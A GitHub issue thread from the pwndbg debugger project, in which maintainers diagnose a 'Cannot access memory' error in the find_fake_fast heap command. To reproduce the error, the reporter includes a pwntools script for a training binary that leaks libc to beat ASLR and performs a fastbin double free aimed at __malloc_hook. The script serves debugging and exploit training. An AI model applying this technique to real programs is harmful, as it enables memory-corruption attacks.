### ISSUE TITLE
Find_Fake_fast (malloc_chunk: Cannot access memory at address)

### ISSUE THREAD

**Issue by Megachar0x01** [pwndbg/pwndbg#1142]
I am using Ubuntu 22.04, pwndbg latest build. The problem I am facing right now is whenever I try to use "find_fake_fast" it prompts an error. 

<img src="https://i.imgur.com/RzYCRAP.png" alt="img_1">

Release 2022.01.05 and 2022.08.30 (https://github.com/pwndbg/pwndbg/releases/tag/2022.01.05) working fine 

<img src="https://i.imgur.com/oKwFVda.png" alt="img_2">

**Comment by gsingh93** [comment]
Hi, I can't reproduce this. Do you have a link to the binary you're testing somewhere?

Also, it would help if you could run `set exception-verbose on` and then trigger that error, so we can see the full stack trace.

**Comment by Megachar0x01** [comment]
Verbose :
<img src="https://i.imgur.com/kR2bFE9.png" alt="img_2">

**Comment by Megachar0x01** [comment]
[bin.zip](https://github.com/pwndbg/pwndbg/files/9533024/bin.zip)

exploit script to recreate above error

```python
#!/usr/bin/python3
from pwn import *
import struct

# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''

continue
'''.format(**locals())

exe = './fastbin_dup'; elf = context.binary = ELF(exe, checksec=False);exe_rop = ROP(elf,checksec=False)
libc = elf.libc ; libc_rop = ROP(libc,checksec=False)

count = 0

def malloc(size,data):
    global count 
    io.sendlineafter(b">",b"1")
    io.sendlineafter(b"size: ",size)
    io.sendlineafter(b"data: ",data)
    count = count + 1
    return count - 1

def free(number):
    io.sendlineafter(b">",b"2")

    io.sendlineafter(b"index: ",str(number))



io = start()

io.recvuntil(b"@ ")
libc_puts = int(io.recvline().strip(b"\n"),16)
libc.address = libc_puts - libc.sym.puts
# leak puts address is used to find base of libc to defeat aslr


io.sendlineafter(b"Enter your username: ",b"Its Time to get shell")


A = malloc(b"104",b"A"*8)
B = malloc(b"104",b"B"*8)



free(A)  
free(B)
free(A) 


malloc(b"104",p64(libc.sym.__malloc_hook - 35 )) 

malloc(b"104",b"A")  
malloc(b"104",b"A") 

io.interactive()
```

**Comment by CptGibbon** [comment]
This was introduced in 69d3576 @lebr0nli 
Your 2nd invocation in the first screenshot needs a `0x` prefix though, that's not a bug.
Always nice to see HeapLAB doing the rounds 🤘

It looks like the issue arises from these lines:
https://github.com/pwndbg/pwndbg/blob/ccc56b9a5856bb761c082bc9d8aadc8e2f03ee0b/pwndbg/heap/ptmalloc.py#L652-L656

Which were originally:

```py
try:
  next(i for i in pwndbg.vmmap.get() if arena_addr in i)
  return pwndbg.memory.poi(self.malloc_state, arena_addr)
except (gdb.MemoryError, StopIteration):
  # print(message.warn('Bad arena address {}'.format(arena_addr.address)))
   return None
```

The `try`/`except` block allowed pwndbg to continue after attempting to read a non-existent arena (this fake chunk happens to have its `NON_MAIN_ARENA` flag set).

**Comment by lebr0nli** [comment]
> This was introduced in [69d3576](https://github.com/pwndbg/pwndbg/commit/69d357633c9a47e4b72b186629bdafc64ec6fa66) @lebr0nli 
> ...
> The `try`/`except` block allowed pwndbg to continue after attempting to read a non-existent arena (this fake chunk happens to have its `NON_MAIN_ARENA` flag set).

@CptGibbon, hmm, that's weird haha, so you mean it's possible that `pwndbg.vmmap.find(arena_addr)` can find the page for the address, but we still can't read the memory there, right?

**Comment by CptGibbon** [comment]
>so you mean it's possible that pwndbg.vmmap.find(arena_addr) can find the page for the address, but we still can't read the memory there, right?

@lebr0nli Huh you're right that's not possible.
It looks like the problem is actually when `get_arena_for_chunk()` calls `get_heap()`:
https://github.com/pwndbg/pwndbg/blob/ffdff0f966f525613e2be0bf805a090747930d2e/pwndbg/heap/ptmalloc.py#L309-L310
Because `get_heap()` doesn't check if the `heap_info` struct is mapped before trying to read it:
https://github.com/pwndbg/pwndbg/blob/ffdff0f966f525613e2be0bf805a090747930d2e/pwndbg/heap/ptmalloc.py#L635-L637
This code has always been bad... What I can't put my finger on is why it started failing after this commit, could it be a caching issue?

**Comment by CptGibbon** [comment]
Whatever the cause, I believe 69d3576 simply brought an existing bug to light.
A bounds check in `get_heap()` would solve this issue.

If you want to hear my conspiracy theory though:
`malloc_chunk()` ignores the return value of `get_arena_for_chunk()` when its `fake` option is set, which `find_fake_fast()` does indeed set:
https://github.com/pwndbg/pwndbg/blob/ffdff0f966f525613e2be0bf805a090747930d2e/pwndbg/commands/heap.py#L607
Because of this and the fact that none of the functions along the way contain any state change, Python never executes `get_arena_for_chunk()` (nor `get_heap()` etc.) during `find_fake_fast()`. However, the change I mention [above](https://github.com/pwndbg/pwndbg/issues/1142#issuecomment-1242217973) in 69d3576 swaps `pwndbg.vmmap.get()` for `pwndbg.vmmap.find()` in `get_arena_for_chunk()`. The latter invokes `pwndbg.vmmap.explore()`, which contains a global state change:
https://github.com/pwndbg/pwndbg/blob/ffdff0f966f525613e2be0bf805a090747930d2e/pwndbg/vmmap.py#L141
Because of this potential state change, Python must always execute `get_heap()` etc. even if the result is discarded.
So the bug was always there, 69d3576 just forced it to be executed.

**Comment by disconnect3d** [comment]
IIUC from #1145 it seems the issue is that `gdb.Value` that is returned here is fetched lazily and #1145 fixes that fetching it immediately.

FWIW from GDB Python API docs:

> Variable: Value.is_lazy
>   The value of this read-only boolean attribute is True if this gdb.Value has not yet been fetched from the inferior. GDB does not fetch values until necessary, for efficiency. For example:
> 
>   `myval = gdb.parse_and_eval ('somevar')`
>   The value of somevar is not fetched at this time. It will be fetched when the value is needed, or when the fetch_lazy method is invoked.

One last thing we need in that PR is a test case to make sure we check for this behavior properly :)
